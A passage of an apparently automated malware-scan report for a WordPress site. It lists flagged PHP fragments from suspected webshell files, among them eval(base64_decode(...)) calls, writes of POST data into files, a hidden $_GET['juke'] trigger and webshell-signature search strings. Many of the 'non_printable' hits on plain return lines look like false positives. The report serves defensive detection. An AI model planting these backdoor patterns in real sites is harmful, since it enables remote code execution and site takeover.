<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_50").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/Agk1ewBXKzc.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:02:14</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:02:14</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_51" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
